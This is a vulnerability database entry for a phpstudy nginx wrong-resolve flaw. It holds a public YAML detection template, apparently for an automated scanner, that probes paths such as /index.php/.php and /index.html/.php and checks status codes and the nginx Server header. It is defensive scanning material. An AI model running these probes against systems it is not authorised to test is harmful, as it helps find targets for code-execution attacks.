phpstudy-nginx-wrong-resolve: Phpstudy Nginx Wrong Resolve

Date: 2025-09-01 | Affected software: phpstudy nginx | POC: public

Vulnerability description

Phpstudy Nginx Wrong Resolve

PoC code [public]

id: phpstudy-nginx-wrong-resolve

info:
  name: Phpstudy Nginx Wrong Resolve
  author: zan8in
  severity: high
  verified: true
  description: Phpstudy Nginx Wrong Resolve
  reference:
    - https://mp.weixin.qq.com/s/ILTuWnkzQAw0Q5-vMU3g1g
    - https://www.seebug.org/vuldb/ssvid-98364
  tags: phpstudy,nginx,wrong,resolve
  created: 2024/07/18

set:
  name: randomInt(10000000, 99999999)
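rules:
  # r0-r3 use /index.php as the existing file; r00-r03 repeat the same checks against /index.html.
  # r0: baseline, a random non-existent .php path must not return 200.
  r0: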
    request:
      method: GET
      path: /{{name}}.php
    expression: response.status != 200
  r1:
    request:
      method: GET
      path: /index.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  # r2: the existing file with "/.php" appended still returns 200 from nginx.
  r2:
    request:
      method: GET
      path: /index.php/.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  # r3: control, the same file with a non-.php suffix appended must not return 200.
  r3:
    request:
      method: GET
      path: /index.php/.xxx
    expression: response.status != 200
  r00:
    request:
      method: GET
      path: /{{name}}.php
    expression: response.status != 200
  r01:
    request:
      method: GET
      path: /index.html
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r02:
    request:
      method: GET
      path: /index.html/.php
    expression: response.status == 200 && response.headers["server"].contains("nginx")
  r03:
    request:
      method: GET
      path: /index.html/.xxx
    expression: response.status != 200
# Match only when all four checks of either variant hold.
expression: (r0() && r1() && r2() && r3()) || (r00() && r01() && r02() && r03())
